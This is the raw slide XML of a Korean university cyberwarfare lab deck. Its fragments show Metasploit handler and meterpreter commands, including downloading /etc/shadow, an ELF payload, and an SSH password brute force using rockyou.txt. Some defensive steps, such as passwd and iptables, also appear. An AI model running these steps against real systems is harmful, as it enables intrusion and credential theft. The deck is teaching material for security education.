              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> exploit(handler) &gt; exploit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dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> &gt;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en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다운로드</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> &gt; download /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>종료</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> &gt; exit</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> exploit(handler) &gt; exit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dirty="0" err="1"/>
              <a:t>다운로드받은</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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 및 다운로드 받은 파일 이름 입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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netstat -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tnap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> | more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>명령으로 열린 포트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-name </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>linux.elf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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/elf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dirty="0" err="1"/>
              <a:t>linux.elf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dirty="0" err="1"/>
              <a:t>linux.elf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–l test01 –P /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/share/wordlists/rockyou.txt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dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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dirty="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알아낸 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>test01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정의 비밀번호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dirty="0"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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passwd test01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dirty="0"/>
              <a:t># iptables –A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 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ettercap</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71687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ssh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164892736"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3089260" y="2678454"/>
          <a:ext cx="6013480" cy="2216785"/>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소프트웨어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Openssl</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4406</TotalTime>
  <Words>10147</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>2707</Paragraphs>
  <Slides>111</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111</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="118" baseType="lpstr">
      <vt:lpstr>Nanum Gothic</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>맑은 고딕 Semilight</vt:lpstr>
      <vt:lpstr>함초롬바탕</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office 테마</vt:lpstr>
      <vt:lpstr>사이버전실습</vt:lpstr>
      <vt:lpstr>/  목  차</vt:lpstr>
      <vt:lpstr>/Intro  교수소개</vt:lpstr>
      <vt:lpstr>/Plan  강의 계획</vt:lpstr>
      <vt:lpstr>/Plan/Inforsec  강의 계획 - 정보보호</vt:lpstr>
      <vt:lpstr>/Plan/Defcybsec  강의 계획 – 국방 사이버 보안</vt:lpstr>
      <vt:lpstr>/Environ  환경</vt:lpstr>
      <vt:lpstr>/Environ/Python  Python 설치</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</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vt:lpstr>
      <vt:lpstr>/Theory/T2/2  # cd</vt:lpstr>
      <vt:lpstr>/Theory/T2/3  # ls</vt:lpstr>
      <vt:lpstr>/Theory/T2/4  리눅스 기본 명령어 – cp</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cp:lastModifiedBy>
  <cp:revision>174</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-02-08T02:39:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-02-21T15:01:49Z</dcterms:modified>
</cp:coreProperties>
</file>